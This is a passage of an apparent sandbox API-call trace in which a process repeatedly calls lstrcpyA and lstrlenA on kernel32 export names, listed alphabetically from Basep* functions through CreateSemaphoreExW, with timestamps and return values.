[0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.635] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.635] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.635] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.635] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.636] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.636] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.636] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.636] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.636] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.636] lstrlenA (lpString="BEEP") returned 4 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.636] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.636] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.636] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.636] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.636] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.636] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.636] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.636] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.636] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.636] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.636] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.636] lstrlenA (lpString="CANCELIO") returned 8 [0185.636] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.636] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.637] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.637] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.637] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.637] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.637] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.637] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.637] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.637] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.637] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.637] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.637] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.637] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.637] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.637] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.637] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.637] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.637] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.637] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.637] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.638] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.638] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.638] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.638] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.638] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.638] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.638] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.638] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.638] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.638] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.638] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.638] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.638] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.639] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.639] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.639] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.639] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.639] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.639] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.639] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.639] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.639] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.639] lstrlenA (lpString="COPYFILEA") returned 9 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.639] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.639] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.639] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.639] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.639] lstrlenA (lpString="COPYFILEW") returned 9 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.639] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.639] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.639] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.640] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.640] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.640] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.640] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.640] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.640] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.640] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.640] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.640] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.640] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.640] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.640] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.640] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.640] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.640] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.640] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.640] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.640] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.640] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.641] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.641] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.641] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.641] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.641] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.641] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.641] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.641] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.641] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.641] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.641] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.641] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.641] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.641] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.641] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.641] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.641] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.641] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.641] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.642] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.642] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.642] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.642] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.642] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.642] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.642] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.642] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.642] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.642] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.642] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.642] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.642] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.642] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.642] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.642] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.642] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.642] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" 